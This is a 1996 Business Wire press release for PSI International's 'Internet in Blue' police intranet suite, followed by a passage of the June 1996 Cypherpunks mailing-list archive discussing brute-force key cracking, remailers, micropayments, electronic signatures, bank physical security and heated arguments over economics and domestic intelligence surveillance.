>        Blue" Police Internet/Intranet Application Suite Available in July
>        1996 
>        
>          Business Editors/Computer Writers
>        
>        Highlights:
>            -- Internet in Blue, one of the first Java-based solutions aimed
>        at fighting crime, is being introduced by PSI International, a
>        strategic partner of Sun Microsystems Federal, and includes other
>        Sun products.  
>        
>            -- Internet in Blue combines the power of Java and Netra servers
>        to enable law enforcement agencies and police departments to quickly
>        leverage the capabilities of the Internet and intranets.  
>        
>            -- This solution is the latest evidence of Sun taking advantage
>        of the significant market opportunity for crime prevention
>        technology.  Last year, Sun Federal announced a dedicated Criminal
>        Justice Operation, which is working with police departments and law
>        enforcement agencies around the world to help them use technology in
>        fighting crime.  
>        
>            MOUNTAIN VIEW, Calif.--(BUSINESS WIRE)-- May 20, 1996--One of
>        the first Sun(TM) Java(TM)-based solutions aimed at fighting crime
>        was introduced today by PSI International, a strategic partner of
>        Sun Microsystems Federal, a subsidiary of Sun Microsystems, Inc.  
>        
>            Called Internet in Blue(TM), the solution combines the power of
>        Sun's Java technology, its Netra(TM) Internet servers, its Java
>        WorkShop(TM) development tools, and PSI's relational database
>        software. This solution fully leverages the capabilities of the
>        Internet for the benefit of law enforcement agencies because of the
>        inclusion of Java, the revolutionary Internet platform from Sun that
>        makes possible fast, easy, operating-system-independent use of the
>        Internet.  
>        
>            To be offered by PSI, Internet in Blue will enable police
>        departments and other law enforcement agencies to leverage the
>        latest Internet technology to fight crime and promote citizen
>        involvement and community-based policing.  From a citizen's
>        perspective, having a local police force with an Internet presence
>        gives people the opportunity to report problems online and play a
>        more active role in fighting crime in their neighborhoods.  
>        
>            Besides utilizing the Internet, the PSI solution also allows
>        local police to build an "intranet," which is a greatly enhanced
>        internal information network to handle departmental processes as
>        well as to speedily access any internal database of interest.
>        Examples of these databases include local crime data such as
>        patterns of crimes, gang affiliations, data on previous suspects and
>        arrests.  Currently, many police departments must locate such data
>        via a paper trail, which is very inefficient.  
>        
>            "Law enforcement agencies are quickly realizing the power of the
>        Internet and intranets as strategic tools in fighting crime," said
>        John Marselle, president of Sun Microsystems Federal.  "The Internet
>        in Blue solution from PSI -- based on Sun technology -- takes
>        advantage of Java's security features, platform independence and
>        database access capabilities.  It should make it much easier for
>        police departments and other criminal justice organizations to get
>        online and to leverage the capabilities of the network."  
>        
>            With Java WorkShop, a visual development environment for Java
>        that can be included as part of the Internet in Blue solution,
>        police departments can design, test, deploy and maintain Internet
>        and intranet applications based on Java with speed and simplicity.
>        Java WorkShop runs on the Sun Solaris(TM) environment and Windows
>        95/NT.  Using Java, the PSIBase relational database management
>        system can access Web browsers across any hardware platform.  
>        
>            "The Internet is the next frontier in the development of law
>        enforcement information systems," said Paul Wormeli, program
>        director for law enforcement at PSI.  "Our Internet in Blue solution
>        will enable law enforcement agencies to quickly exploit the latest
>        technologies like Java."  
>        
>        Internet in Blue includes the following:
>        
>            A starter kit with a Sun Netra Internet server and PSI software
>        and services needed to set up a site on the World Wide Web, as well
>        as technical assistance from PSI for developing content and training
>        for a Webmaster.  
>        
>            A full set of applications to create a police intranet providing
>        secure internal access to selected crime information, standard
>        operating police procedures and other infrastructure services.  
>        
>            An interactive, community-based communications medium to
>        facilitate crime reporting over the Internet and community-based
>        policing.  
>        
>            Suggestions for services that law enforcement agencies can
>        develop in order to offset the cost of the Internet project, such as
>        providing online crime reports and accident report information to
>        authorized outside organizations including legal firms and insurance
>        companies.  -0-
>        
>            The Internet in Blue product will be available in July, 1996.
>        Pricing will vary depending on customer needs.  
>        
>            PSI International, Inc. has provided systems integration and
>        services for over 14 years to federal, state and local governments.
>        The company specializes in law enforcement and public safety
>        solutions, consulting services, and integration of software and
>        hardware.  With a staff of over 250 professionals in the information
>        system and services industry, PSI has a team of people that have
>        both technical and industry knowledge of public safety and justice
>        applications, including computer aided dispatch, records and
>        investigative management, imaging, telecommunications, and mobile
>        computing.  
>        
>            Sun Microsystems Federal, Inc., headquartered in Vienna,
>        Virginia, is a subsidiary of Sun Microsystems, Inc.  Sun Federal's
>        charter is to develop, deliver and sustain markets for Sun products
>        in governments worldwide.  
>        
>            With annual revenues of $6 billion, Sun Microsystems, Inc.,
>        provides solutions that enable customers to build and maintain open
>        network computing environments.  Widely recognized as a proponent of
>        open standards, the company is involved in the design, manufacture
>        and sale of products, technologies and services for commercial and
>        technical computing.  Sun's SPARC(TM) workstations, multiprocessing
>        servers, SPARC microprocessors, Solaris(Tm) operating software and
>        ISO-certified service organization each rank No. 1 in the UNIX(TM)
>        industry.  Founded in 1982, Sun is headquartered in Mountain View,
>        Calif., and employs more than 16,000 people worldwide.  -0-
>        
>            Note to Editors: Sun, the Sun logo, Sun Microsystems, Java, Java
>        Workshop, Netra and Solaris are trademarks or registered trademarks
>        of Sun Microsystems, Inc. in the United States and in other
>        countries.  All SPARC trademarks are used under license and are
>        trademarks or registered trademarks of SPARC International, Inc. in
>        the United States and other countries.  Products bearing SPARC
>        trademarks are based upon an architecture developed by Sun
>        Microsystems, Inc.  UNIX is a registered trademark in the United
>        States and other countries exclusively licensed through X/Open
>        Company, Ltd.  
>        
>            Internet in Blue is a trademark of PSI, International and is
>        properly written in boldface italics, all lower case.  
>        
>            Press announcements and other information about Sun Microsystems
>        are available on the Internet via the World Wide Web using a tool
>        such as Netscape or NCSA Mosaic.  Type http://www.sun.com at the URL
>        prompt.  
>        
>        --30--css/sf*
>        
>        CONTACT: Burson-Marsteller (for Sun)
>                 Jane Rauckhorst, 212/614-4880
>                     or
>                 PSI International
>                 Martha Hill, 703/352-8700
>        
>        KEYWORD: CALIFORNIA
>            INDUSTRY KEYWORD: COMPUTERS/ELECTRONICS COMED
>        INTERACTIVE/MULTIMEDIA/INTERNET PRODUCT GOVERNMENT
>        
>         REPEATS: New York 212-752-9600 or 800-221-2462; Boston 617-236-4266
>        or 800-225-2030; SF 415-986-4422 or 800-227-0845; LA 310-820-9473 BW
>        URL: http://www.businesswire.com
>        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 8 Jun 1996 00:36:37 +0800
To: cypherpunks@toad.com
Subject: Re: Multiple Remailers at a site?
In-Reply-To: <19960604232157.2053.qmail@ns.crynwr.com>
Message-ID: <19960607121455.12742.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


nelson@crynwr.com writes:

 > Therefore, to keep the characteristics of the trusted host constant
 > when converting into a partially trusted network, each of the
 > individual hosts needs to increase their parameters by some amount
 > (which amount someone else will have to contribute, cuz I have no clue
 > and need sleep).

Ahhhh, sleep is a wonderful thing.  It clears the brain so well.  The
increase is proportional to the level of distrust of the individual
hosts by other hosts.  If you think half the hosts are TLS moles,
you'd double your characteristics (reordering and traffic).

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 8 Jun 1996 07:08:18 +0800
To: cypherpunks@toad.com
Subject: Re: Cost of brute force decryption.
Message-ID: <199606071645.JAA04692@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
> 
> On  4 Jun 96 at 10:58, Bruce M. wrote:
> 
> [..]
> > 	"If you can ensure secrecy either until no one cares about the 
> > information or so that cracking the code costs more than the information 
> > is worth, it's 'secure enough.'
> > 
> > 	"For example a 40-bit key takes about $10,000 worth of supercomputer 
> > time and two weeks to crack.  Although this key may be adequate to 
> > protect my checking account, it's probably not large enough for the 
> > accounts of a major corporation.
> [..]
> 
> The figures look familiar.  No references around.  I'm not sure it would 
> require a whole two weeks for 40-bits, though.  Possibly less than a 
> day? (Or was that why you asked baout the figures?)

A week? No.

The second round of the cypherpunk's distributed key cracking (which 
bruted 40 bit RC4) completed  in 38 hours. That was a year ago.
With the growth in the number of interested people on the net, and the
upgrades in cpu power since then, I expect that a similarly motivated 
effort could burn the same number of cycles in well under 24 hours.
(The bottleneck a year ago was in coordination - not raw processing
power).

Prediction: By the millenium, we'll have made single DES look about as
silly as 40 bit RC4 is today.

Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 8 Jun 1996 07:12:04 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <2.2.32.19960607170941.0075b778@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:29 AM 6/7/96 -0700, jamesd@echeque.com wrote:
>At 06:54 AM 6/6/96 -0400, Duncan Frissell wrote:
>> (I've often
>> wondered why Hamas uses/used couriers for getting funds to Israel when
>> Israel has a great ATM network with international links.)
>
>Sounds like you are suffering caffeine withdrawal.  Try wondering again 
>after you have had some coffee.
> ---------------------------------------------------------------------

James.  What am I missing?  It is trivial to keep both ends of an international ATM transaction anonymous.  And if Hamas suicide bombers can make it into Israel proper, I'm sure bagmen can hit ATMs there.  There may even be ATMs in East Jerusalem or on the West Bank.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 8 Jun 1996 07:16:13 +0800
To: Sean T Carnes <crisper@ascensionet.com>
Subject: Re: Banking's Physical Security
In-Reply-To: <01BB545E.2DDAE5C0@ppp3>
Message-ID: <Pine.SUN.3.91.960607131001.13383B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Sean T Carnes wrote:

> 	We all know that banks are very highly protected as far as their 
money goes but how safe are there computers?  I live very close to a 
computer database collecting company that collects the data related to  
many banks in the area.  It is all done through land lines and is not 
very well protected.  They aren't very careful about who or what they 
let into the building also.  If someone were to cut the lines the banks 
in the area would be out for days and they wouldn't have a means to do 
interbank transactions outside of the immediate area.  Has anyone else 
seen this in there area or heard of it. Wouldn't it be a better idea to 
do the transactions by satellite.

^^

Very vulnerable to jamming.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 8 Jun 1996 08:29:03 +0800
To: Clay Olbon II <Clay.Olbon@dynetics.com>
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <ADDDA7B6-382D7B@193.239.225.200>
Message-ID: <Pine.SUN.3.91.960607131101.13383C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On 7 Jun 1996, Clay Olbon II wrote:

> Jonathon,
> 
> >	Statistical proof is only accepted in academia.  Depending
> >	upon your POV, this may or may not be a good thing, when
> >	one is facing civil, or criminal charges.  
> >
> >	Finding proof for either civil or criminal charges is a 
> >	slightly different matter.
> 
> IANAL,

And so you thought you would engage in legal commentary, of course. :)

> but your statements are misleading.  Statistics are often used in
> both criminal and civil cases.  Look at the DNA evidence in the OJ trial
> (OK, maybe a bad example), or the evidence that breast implants don't cause
> various ailments (probably another bad example :-).  Both of these examples
> are based on statistics.  IMO, part of the problem with juries (and public
> discourse in general) today is that anecdotal evidence is often accepted,
> when that evidence is clearly not statistically significant.  The examples
> I cited previously illustrate this - the four horsemen are a similar
> example for public policymaking.  

Statistical evidence is fairly strictly regulated actually in a judicial 
context.

e.g., People v. Collins, 438 P.2d 33 (1968) (prohibiting mathamatical odds and 
statistical evidence from use in identification and requireing strict 
foundation to be laid before any probability evidence will be admitted); 
Cole v. Cole, 328 S.E.2.d 446 (1985) (discussing the nature of 
probability in relation to the scope of the evidence presented); Frye v. 
U.S., 293 F. 1013 (D.C.Cir 1923) (estlablishing the rule that scientific 
evidence must be treated with a different standard even when presented 
by certified experts.  specifically that it must be 'generally accepted in 
the scientific community);  See Generally, L.J. Cohen, The Probably and 
the Provable (1977).

> 	Clay
> 
> ---------------------------------------------------------------------------
> Clay Olbon II            | Clay.Olbon@dynetics.com
> Systems Engineer         | ph: (810) 589-9930 fax 9934
> Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
> 550 Stephenson Hwy       | PGP262 public key: on web page
> Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
>                      TANSTAAFL
> ---------------------------------------------------------------------------
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sat, 8 Jun 1996 08:26:17 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <199606071452.KAA18055@jekyll.piermont.com>
Message-ID: <9606071731.AA04519@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry writes..

>Dr. Phill Hallam-Baker, PhD, seems to know even less about free market>
>environmentalism than he knows about futures and options.

This is the Perry argument!

Call someone a fool, invite ridicule... ohhh perry does that make you feel big?
does that make you feel like you can argue?

Of course you can't argue or you would not have begun your arguement with a 
gratuitous insult. You are clearly uncertain of your case and feel that you have 
to puff yourself up a bit and try a bit of intimidation. 


I asked my stock broker about the trades Hilary did. Sorry Perry, you were wrong 
5% margin is sufficient in most markets. That means $1000 can cover $20,000. 
Your whole case was based on a false premise.

Since the last time you began a Perrygram by insulting me you turned out to be 
wrong it should be no suprise for this to be a repeat.

The argument from Friedman was as published in a letter to the London Times by 
the man himself. You can even go and look it up if you like, it was published in 
'89 or '90. He did not make a reference to "stakeholders". That was not his 
argument. His argument was based entirely on the mechanism of the market, supply 
and demand.


	-Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sat, 8 Jun 1996 13:49:43 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <v03006f0caddd1c3bbce1@[199.0.65.105]>
Message-ID: <9606071739.AA04525@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>According to your logic above, it seems that all species are *much* more
>important than man. But, with most "liberal" logic, there's a paradox here.
>Let's explore it bit, shall we, by looking at the other side of the balance
>sheet you just created?

No, you miss the point. Friedman has become a slave to his theory, he is 
attempting to push his idea even to solve a situation it clearly cannot. There 
are good reasons to conserve whale stocks irrespective of your eccological 
position. Without sufficient stocks the whaling industry will go the way of the 
carrier pidgeon canning industry.

>Tell me, Phill, what's *your* pricetag on a single *human* life? The entire
>gross global product is not enough? It's this kind of, well, muzzy-headed
>innumerate (yes, *Dr.* Hallam-Baker, *innumerate*) silliness that has our
>intellectuals believing the hoax, put convincingly enough to get published
>in "respected" academic places like "Social Text", that reality (physics,
>in this case) is optional.

Bob, you are way off base here. You are putting up a straw man. I have not 
endorsed the views of Social text, I've not even mentioned them. 


As I stated I am much more inclined to the logical positivist view than to the 
continental school of philosophy of which social text is an exemplar. My views 
on Derrida and his school are pretty negative, he has perhaps three good ideas 
and has been eeking them out with showmanship. I don't think that the 
deconstructionists are able to enter into a rational debate because they 
continually consider themselves obliged to challenge the terms of the debate. 

I'm fairly familiar with the debate that Social Text engages in and I consider 
it to be pretty bogus. They are arguing that language is insufficient for the 
purposes of their discussion so they create a new vocabulary without 
preconceptions. This project is doomed to failure since there is no means of 
defining the new language except in terms of the one in common usage they have 
rejected. So one might as well use plain language for arguement.

This is why the Web is heavilly influenced by Hermenuetics, the point Sokal was 
making was actually one which is central to the work of Hiedegger and Gadamer. 
The establishment of a shared vocabulary is necessary for communication, 
communication defines being. It is entierely illogical for someone claiming to 
be establishing a theory of communication to do so by attempting to establish a 
private ontology. The Social Text people are refuted by their own work. 


>Can you say "Sophistry", boys and girls? I knew you could. No offense to
>the, er, numerate computer science people out there, but it seems that
>*Dr.* Hallam-Baker is living proof that you can get an entire *doctorate*
>in the field, and not learn to count. 

Bob, you would be able to make your point better if you had an understanding of 
the principles you are discussing. I have some understanding of philosophical 
method and how to apply it. Your point on sophistry is a straw man. Solopcism is 
a paradox, it is an argument which demonstrates the inadequacy of our system of 
thought. Descartes and Hume argued the point at great length, whether mind or 
sensation is primary. 


I fail to see how you make the bridge from comments on Friedman to Social Text. 
I was merely pointing out that I consider Friedman to be overly ideological and 
that the certainty he claims for his results are not backed by empirical proof. 
He has described a theory which is impossible to prove or disprove because it is 
impossible to perform controlled experiments. Would the US ecconomy be stronger 
if Carter had won in 1980 instead of Reagan? Its impossible to say.


If the libertarian fringe does not wish to remain so I suggest you try the 
following:-

1) Never ever start a post by directly stating that someone is an ignoramous.

2) Accept the fact that some people do not accept the axioms you are arguing 
from.

3) Differentiate between advancing your arguement and advancing your ego.


The first is the most important. If you have no respect for the people you are 
arguing against you will utterly fail to convince them of anything. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 8 Jun 1996 10:38:08 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Micropayments: myth?
In-Reply-To: <199606070205.WAA20230@jafar.sware.com>
Message-ID: <199606072058.NAA05291@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>> the wallet action will always
>> be tied with some other action. the user picks up the phone to dial
>> somewhere, and it says, "that will be .3c-- will you pay"? he says
>> yes. 
>
> How will you know the cost is .3c a priori?
>What's to stop me from saying yes to the .3c and staying on the line
>forever?

I don't understand why this micropayment thing is being thought
so complicated.

I am making some simple assumptions that seem to not be obviously
apparent, apparently.

I don't think micropayments make sense in transactions in which
the buyer requires the ability to back out of a purchase. in
other words, if I download an FTP file, pay 2c, and then say,
"this isn't what I wanted", I don't think a refund is typically going
to be supported. it would be up to individual vendors, but I doubt
very many would allow it.

a service [x] knows how much they are going to charge for a file
or a http transfer. they tell the user, "you can have this for
[x] cost". the user *sends* them the money to get the data.
there is no concept of the company going into their wallet and
pulling out the cash. the buyer sends the token and initiates the
entire transaction. I am not saying this micropayment thing is
going to be the only way future transactions will work. of course
not. it's just one way that makes some assumptions.

what about services that don't deliver? I would imagine a cyberspatial
equivalent of the BBB will be just fine for that. an agency that
registers complaints. a company doing a micropayment bilk scheme
could only get away with a small amount of cash before they got
a bad reputation. the reputation could be checked by the browser
prior to paying, that kind of thing.

the example I gave of a phone service billing people for phone calls
was not a great example for micropayments, but it could be pulled
off. imagine that your phone has a little readout that tells you
how much you are being charged. you can cancel the call. you can
watch your little readout as it bills you money. you could set
limits, "do not pay more than 10c/minute". these limits are built
into your *local* wallet (browser, phone) etc.-- they are not
handled by the company that is charging you. hence you retain
full control.

  If you disallow that, how?  Will it cost the same amount if
>I'm not sending anything as it will if I'm sending a live video + audio
>feed?  If so, what's to stop me from bundling my whole neighborhood's
>Internet traffic into this call?  If not, how will you tell the
>difference without monitoring my usage and requiring me to pay for the
>additional bandwidth I use?

MICROPAYMENTS. they are for small transactions. the standard billing
model will be used in other situations as it is today, although it
will be moved into a cyberspatial equivalent. micropayments are NOT
going to be the only way the future economy will work. I think some
people seem to have some misconceptions about this. it won't make
sense to use microcurrency everywhere. I don't know if micropayments
will ever be tied to each pack like you are proposing. at least
in the beginning, I would assume a structure like the internet is
today with a micropayment charges built on top of it like I suggested
with browsers or that kind of thing.

companies will probably charge for bandwidth if they are charging for
network services. you can't send a lot of data without using more
bandwidth.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Sat, 8 Jun 1996 14:21:14 +0800
To: Ernest Hua <hua@XENON.chromatic.com>
Subject: Re: NSA/CIA to snoop INSIDE the U.S.???
Message-ID: <v01510103adde28dab2e8@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


This is a fucking big story.

Allowing the CIA and NSA to snoop domestically, and using only a handful of
suspicions and anecdotes about cybernastiness and evil cryptohackers to
justify this major policy shift -- well, it's fucking amazing.

Nunn's proposal, unfortunately, was more than a "suggestion."

But Rory's right. DC *is* in the throes of Internet fever, and it'll just
get worse as the summer gets hotter and hotter. It's almost 80 degress
right now.

-Declan



>What?!  What the *@#!! is wrong with the people who supposedly smart
>people representing us?!
>
>Ern
>
>-------- From SJ Mercury:
>
>    NET FEVER ON THE HILL
>
>    Published: June 6, 1996
>
>    BY RORY J. O'CONNOR
>    Mercury News Washington Bureau
>
>    WASHINGTON -- The White House wants a coordinated task force to fight
>    terrorism on the Internet. Some senators think the CIA should be
>    allowed to work hand in hand with the FBI to fight computer crime on
>    U.S. soil. Meanwhile, the federal courts are deciding a major First
>    Amendment case that might ban certain information from the Net.
>
>    The nation's capital is in the throes of Internet fever.
>
>    For the past several months, the condition has become acute, and by
>    the end of the year the Internet itself may look far different as a
>    result: more tightly regulated, more carefully monitored and more
>    expensive.
>
>    The latest symptom: a suggestion Wednesday for the elimination of laws
>    that prohibit U.S.  intelligence agencies -- notably the National
>>>> Security Agency and the Central Intelligence Agency -- from snooping   <<<
>>>> on home soil. The reason: The potential for computer crime and         <<<
>    terrorism is so great, and the Internet so decentralized and
>    international, that police and the FBI must combine forces with spy
>    agencies in order to successfully analyze the threat and investigate
>    criminal activity.
>
>    ''If we're going to live in this kind of world, we're going to have to
>    link the intelligence world with law enforcement,'' said Sen. Sam
>    Nunn, D-Ga.
>
>    For many people in government who work on computer and law-enforcement
>    issues, the course of the disease seems painfully slow. They often
>    describe the Internet as the Wild West that's sorely in need of a good
>    marshal. But for many people who use the Internet, the government's
>    efforts are moving far ahead of any real knowledge of a technology
>    that, two years ago, almost nobody had heard of.
>
>    ''There are not dead bodies in the street,'' said Donna L. Hoffman, a
>    professor at Vanderbilt University who studies the Internet. ''It just
>    doesn't make sense to rush into legislation.''
>
>    [ SNIP ]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Sat, 8 Jun 1996 12:40:38 +0800
To: cypherpunks@toad.com
Subject: Wasting time and bandwidth on Bell
Message-ID: <Pine.3.89.9606071348.A12943-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 7 Jun 1996 08:29:56 -0400 (EDT), Declan McCullagh wrote:

>Excerpts from internet.cypherpunks: 6-Jun-96 Re: FOR WHOM THE BELL TOLLS
>by jim bell@pacifier.com 
>> Not quite yet, anyway.  I'm very disappointed to have waited over a 
>>year for 
>> some slick lawyer to show me how I'd be violating some law or another
>>to do so
...
>A few observations:

>1. Not many readers of cypherpunks are lawyers

I've noticed quite a few, actually.  I don't know how many are regular
readers but there seems to be enough to maintain a steady undercurrent of
legal thinking on the issues associated with digital commerce, some
anonymity and First Amendment issues, a sprinkling of criminal law topics,
and of course, banking, intellectual property, SEC, antitrust, general
contract, and related commercial law.

>2. Of the laywers who do read cypherpunks, many may not choose to spend
>their time researching what laws AP may violate. Or they're not "slick"
>lawyers; take your pick.

Or they automatically delete any posts that come from or relate to the 
puerile bullshit Bell is infamous for, and choose not to get dragged into 
this type of time- and bandwidth- wasting garbage.  Of which this post is 
just another, of course, but i get so damn sick and tired of the constant 
imposition of 'AP' and related nonsense on this list.  Of late, the 
trolls seems to be particularly effective among people who should know 
better, and an aura of credence or relevance has developed around some of 
this crap.  Can't we just ignore it, and move on?  Maybe if we ignore him 
he'll go away.

>3. Congress would have no problems passing a law outlawing AP, if one
>does not exist already.
>
>-Declan

I would be satisfied if they just outlawed e-mail about it. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 8 Jun 1996 13:35:27 +0800
To: <cypherpunks@toad.com
Subject: Re: [NOISE] Banking's Physical Security
Message-ID: <199606071803.LAA05945@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



From: Sean T Carnes <crisper@ascensionet.com>

> We all know that banks are very highly protected as far as their money =
> goes but how safe are there computers?  I live very close to a computer =
> database collecting company that collects the data related to many banks =
> in the area.  It is all done through land lines and is not very well =
> protected.  They aren't very careful about who or what they let into the =
> building also.  If someone were to cut the lines the banks in the area =
> would be out for days and they wouldn't have a means to do interbank =
> transactions outside of the immediate area.  Has anyone else seen this =
> in there area or heard of it. Wouldn't it be a better idea to do the =
> transactions by satellite.

There's a big difference between a real bank and a data collection outfit. I used
to work at a major money center bank in the Wall Street area. To get to the data 
center I had to:

1. Walk into the building, past an armed security guard.
2. Within sight of him, use my badge stripe to get through a turnstile - most employees
    had badges which were limited in the times they would work.
3. Take an elevator to the (unadvertised)  correct floor.
4. Use my badge in a reader to get out of the elevator lobby - most badges were 
    restricted in the floors they would open.
5. Use my badge to get through an unmarked door, into the 'airlock'.

In the airlock, I'd hold my photo ID up to a reader, so the guard downstairs could.

a. Compare my face against that on the photo ID.
b. Check that I was authorized to enter the data center.
c. Check that there was no one else in the airlock with me.

If he was satisfied, he'd open the inside door remotely.

6. The data center was manned by at least two operators (usually more), 24 hours
a day, seven days a week. Only they were permitted to touch terminals connected to
operational systems.

(There were other security features I won't go into.)

Sure, our fiber optic lines to CHIPS and the Fed occasionally went out - that's what 
backup dialout phone lines are for. If we had phone
problems, the lines were fixed in a couple hours, not days. At a pinch, I imagine you
could use now a cellphone and  modem to keep things moving.

Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 8 Jun 1996 03:52:37 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic Signatures
In-Reply-To: <19960606185840.9230.qmail@ns.crynwr.com>
Message-ID: <19960607141610.13186.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

 > >  > 	The law does not specify how an electronic document must be 
 > >  > signed, but Barassi and others say it probably will mean coding the text 
 > >  > and typed signature so they cannot be changed by anyone other than the 
 > >  > writer.
 > 
 > Before you get all hot under the collar, may I note that I've known
 > Barassi for more than a year, and he is very technically sophisticated.
 > Allow for some reporter-garble.   Barassi understands digital signatures
 > as well as you do.

I never said or even (should you be a telepath) thought that he
didn't.  Heck, I've PGP-signed documents which I've then had to FAX to
people.  :)  OCR is your friend, eh?

No, I was responding to the person who was distrustful of the law's
requirement for certified signatures.  DON'T WAIT FOR THE GUVMINT TO
CREATE A CERTIFYING AGENCY -- start your own and get some momentum.
Makes it much harder for them to claim that PGP won't work because
there's no central signature registry.  PGP doesn't require a central
registry, but then again it doesn't disallow it either.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 8 Jun 1996 11:59:51 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: Anonymous stock trades.
In-Reply-To: <9606071731.AA04519@Etna.ai.mit.edu>
Message-ID: <199606071820.OAA18322@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> Call someone a fool, invite ridicule... ohhh perry does that make
> you feel big?

Not nearly as big as insisting that all around acknowledge your
doctorate must make you feel, Dr. Phill Hallam-Baker, PhD.

I like the fact, by the way, that you essentially ignored the
substance of my comments, and instead chose to discuss peripheral matters.

If anyone wants to see real discussion of environmental issues with an
emphasis on market based solutions, rather than arguments pulled out
of the buttocks of Dr. Phill Hallam-Baker, PhD, I suggest the writings
of, among others, Karl Hess Jr. (oh, and Dr. Phill Hallam-Baker, PhD
might wnat to know that its Dr. Karl Hess)

> I asked my stock broker about the trades Hilary did. Sorry Perry,
> you were wrong 5% margin is sufficient in most markets.

Only in some markets, but that doesn't matter. She had even less than
that on all of her trades, or didn't you pay any attention, Dr. Phill
Hallam-Baker, PhD. You should have been able to figure that out from
my remarks, incidently -- had she merely been controlling $20,000
worth of cattle with a $1000 investment she couldn't possibly have
wiped out her net worth on a single transaction. Control hundreds of
thousands or millions of dollars worth of cattle, however, and a
sneeze in the marketplace will cost a pretty penny.

Frankly, I think this latest flub demonstrates you don't know any of
the facts of the case, You can't name the size of her trades. You
didn't even know whether she was trading options or futures. I suspect
you are just plain ignorant of the entire situation and are pulling
facts out of your buttocks, largely for reasons of your partisan
support of the Clintons.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 8 Jun 1996 12:53:34 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Anonymous stock trades.
In-Reply-To: <9606071739.AA04525@Etna.ai.mit.edu>
Message-ID: <199606071832.OAA18353@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> No, you miss the point. Friedman has become a slave to his theory, he is 
> attempting to push his idea even to solve a situation it clearly
> cannot.

I don't believe you when you claim that Friedman said what you claim
at all. I suspect it is, as most of your other comments have been,
either a complete misunderstanding of some actual comments or
something pulled essentially out of the air. The claim you have made
is so at odds with the Milton Friedman who's writings I have been
reading for years (and indeed so out of character for any member of
his economic school) that I find it nearly impossible to believe that
the article exists as stated.

No modern economist would claim that the market solution to preventing
